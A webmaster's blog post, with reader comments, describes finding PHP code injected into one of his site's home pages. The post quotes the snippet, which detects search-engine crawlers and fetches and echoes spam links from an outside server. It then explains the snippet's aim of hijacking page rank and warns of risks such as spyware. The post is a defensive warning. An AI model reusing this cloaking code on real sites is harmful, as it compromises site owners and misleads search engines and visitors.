Web Site Hack Alert
By Stephen Spry : Filed under SBSN News
I just “discovered” someone had embedded some PHP code on the home page of one of my web sites which redirected search engine robots to a page full of “links”.
I’m not quite sure “how” it got inserted onto the bottom of this home page, but its intent is fairly obvious.
This little piece of php scripting:
$HTTP_USER_AGENT=$_SERVER["HTTP_USER_AGENT"];
if (strstr($HTTP_USER_AGENT,”Googlebot”) or
strstr($HTTP_USER_AGENT,”msnbot”) or
strstr($HTTP_USER_AGENT,”Slurp”) or
strstr($HTTP_USER_AGENT,”Yahoo”) or
strstr($HTTP_USER_AGENT,”ZyBorg”) or
strstr($HTTP_USER_AGENT,”Jeeves”)){
$strget=file_get_contents(”http://srv1.searchingwww.net/allrandom.php”);
echo $strget;
is designed to “grab” search engine robots and redirect them to the URL at http://srv1.searchingwww.net/allrandom.php
So what happens when they get there?
Well if you were to look yourself, you’d see nothing unless you look at the actual HTML coding… And only then would you see a whole list of randomly generated URLs which point to keyword spam sites organised by these filthy people.
URLs to sites that capitalise on Adsense clicks and other affiliate programs that these slime are members of!
These URLs are hidden in a 1×1 pixel marquee which looks like this (I’ve actually substituted my OWN URLs here to get some linking benefit from it, and made it bigger so you can see!)
The main purpose of such an exploit seems to be to:
- get search engines to go to these dubious links from your page, and
- possibly transfer some of your page rank to these spam sites.
Fortunately, this hack had no effect on my site - because my page wasn’t in PHP, the robots would not have been able to follow the link in the script…
But…
There are several reasons why you should be worried about such an exploit!
- someone has hacked into your home page in the first place. It wasn’t something you would even notice unless you actually examined your HTML code.
- your site might be penalised or even banned by search engines for associating with “bad neighbourhoods” - i.e. pointing to these keyword spam sites.
- a variation of this type of script could have resulted in your site being the source of an uninvited spyware download into your visitor’s computer.
So now there’s something else you have to look out for!
Regards
Stephen Spry
SBSN Webmaster
Stephen, an intersting if not slightly worrying article. Where did they put it (head, body)? I build most of my sites with PHP so it’s something I need to keep an eye on.
To be honest, I really can’t remember the specifics… other than it was at the bottom of my index.html page on one of my sites… maybe they were hoping it was set to parse PHP so it would work for them… thankfully it wasn’t. But these people do try to hack the more “obvious” files like index.php or header.php/footer.php, or even this more brazen effort when they actually added a couple of posts to a different site of mine…
It just shows when you have a lot of virtual real estate, that you’ve got to keep an eye on what’s happening there…